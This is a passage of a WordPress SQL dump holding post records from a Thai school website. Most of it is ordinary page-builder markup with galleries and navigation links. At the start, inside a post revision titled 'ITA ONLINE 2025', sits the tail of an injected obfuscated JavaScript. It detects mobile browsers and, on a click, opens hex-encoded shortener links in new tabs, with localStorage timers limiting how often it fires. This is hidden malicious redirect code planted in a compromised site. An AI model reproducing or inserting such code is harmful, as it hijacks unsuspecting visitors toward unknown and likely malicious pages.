_0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-07-05 14:50:51','2025-07-05 07:50:51','',871,'http://pakhaeng.ssk.in.th/?p=1709',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(1711,1,'2025-07-05 14:51:04','2025-07-05 07:51:04','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 